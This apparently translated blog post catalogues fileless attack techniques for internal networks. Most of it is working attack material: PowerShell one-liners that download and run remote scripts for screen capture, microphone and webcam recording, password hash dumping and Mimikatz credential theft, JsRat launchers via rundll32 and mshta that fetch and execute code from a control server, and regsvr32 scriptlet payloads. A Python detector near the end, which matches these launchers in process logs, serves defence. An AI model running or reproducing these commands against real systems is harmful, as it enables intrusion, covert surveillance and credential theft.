Fileless Attack Techniques on Internal Networks

Powershell

Screen monitoring:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://evi1cg.me/powershell/Show-TargetScreen.ps1'); Show-TargetScreen"

Audio recording:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1'); Get-MicrophoneAudio -Path $env:TEMP\secret.wav -Length 10 -Alias 'SECRET'"

Webcam capture:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1'); Capture-MiniEye -RecordTime 2 -Path $env:temp\hack.avi"

Dumping hashes:

powershell IEX (New-Object Net.WebClient).DownloadString('http://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

Dumping plaintext credentials:

powershell IEX (New-Object Net.WebClient).DownloadString('http://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

Empire:

[screenshot not preserved]

Metasploit:

[screenshot not preserved]

js

JsRat:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

LocalNetworkScanner:

http://blog.skylined.nl/LocalNetworkScanner/

[screenshot not preserved]

Obtaining the client's internal and external IP addresses (STUN)

http://github.com/diafygi/webrtc-ips

Firefox and Chrome support WebRTC, which can query a STUN server and get back both the internal and the external IP address. Unlike an XMLHttpRequest, a STUN request does not show up as a network request in the browser's developer tools.

//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};
 
    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };
 
    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;
 
    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
 
    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);
 
    //listen for candidate events
    pc.onicecandidate = function(ice){
 
        //skip non-candidate events
        if(ice.candidate){
 
            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
 
            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);
 
            ip_dups[ip_addr] = true;
        }
    };
 
    //create a bogus data channel
    pc.createDataChannel("");
 
    //create an offer sdp
    pc.createOffer(function(result){
 
        //trigger the stun server request
        pc.setLocalDescription(result, function(){});
 
    }, function(){});
}
 
//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});

Demo: http://diafygi.github.io/webrtc-ips/

mshta

Launching JsRat:

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Running JSRAT:

regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll

JSRAT.sct

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
    
            rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        new ActiveXObject("WScript.Shell").Run(rat,0,true);
    
        ]]>
</script>
</registration>
</scriptlet>

sct

SCT:

regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll

calc.sct

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Empire"
    progid="Empire"
    version="1.00"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
    >
    <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
    <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
    <!-- That should work over a proxy and SSL/TLS... -->
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
    
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    
        ]]>
</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    
    function Exec()
    {
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
    }
    
]]>
</script>

</scriptlet>

wsc

Wsc:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")

calc.wsc

<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>

</component>
</package>
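Every launcher listed above (the PowerShell download cradles, rundll32 and mshta with a javascript: URL, regsvr32 loading a remote .sct through scrobj.dll, and GetObject with a script: moniker) has to pass its payload through the process command line, which is what a defender can log and match on. The following Python is an added example, not code from the original post: it classifies constructed Sysmon-style process-creation command lines against the shapes shown on this page; the rule names are my own labels and example.invalid is a placeholder host.

```python
import re

# Each rule pairs a launcher shown on this page with the command-line
# artefacts it leaves in process-creation telemetry (Sysmon Event ID 1,
# or Security 4688 with command-line auditing enabled). Rule names are
# my own labels, not vendor signatures.
RULES = [
    ("powershell download cradle (IEX + DownloadString)",
     re.compile(r"(?i)^(?=.*powershell)(?=.*\b(?:IEX|Invoke-Expression)\b)(?=.*DownloadString)")),
    ("rundll32 javascript: protocol handler",
     re.compile(r"(?i)rundll32(?:\.exe)?\s+javascript:")),
    ("mshta javascript: inline script",
     re.compile(r"(?i)mshta(?:\.exe)?\s+javascript:")),
    ("regsvr32 remote scriptlet via scrobj.dll",
     re.compile(r"(?i)regsvr32.*[/-]i:https?://.*scrobj\.dll")),
    ("GetObject script: moniker (.wsc)",
     re.compile(r"(?i)GetObject\(\s*['\"]script:")),
]

def classify(cmdline):
    """Return the names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def triage(events):
    """Map each suspicious command line to its matched rules; clean lines are dropped."""
    result = {}
    for cmdline in events:
        hits = classify(cmdline)
        if hits:
            result[cmdline] = hits
    return result

# Constructed sample telemetry (not captured events); example.invalid is a
# placeholder host. The first five mirror the launcher shapes on this page,
# the last two are benign uses of the same binaries and must stay clean.
SAMPLE_EVENTS = [
    'powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x.ps1\')"',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
    r'mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
    "regsvr32 /s /n /u /i:http://example.invalid/JSRAT.sct scrobj.dll",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://example.invalid/calc.wsc")',
    r"regsvr32 /s C:\Windows\System32\msxml3.dll",
    "powershell -Command Get-Process",
]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits)}\n    {cmdline}")
```

The rules key on the launcher shape rather than on any particular URL or script name, so the two benign lines (a local regsvr32 registration and a plain PowerShell cmdlet) fall through untouched.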

Tags: internal network, fileless attack
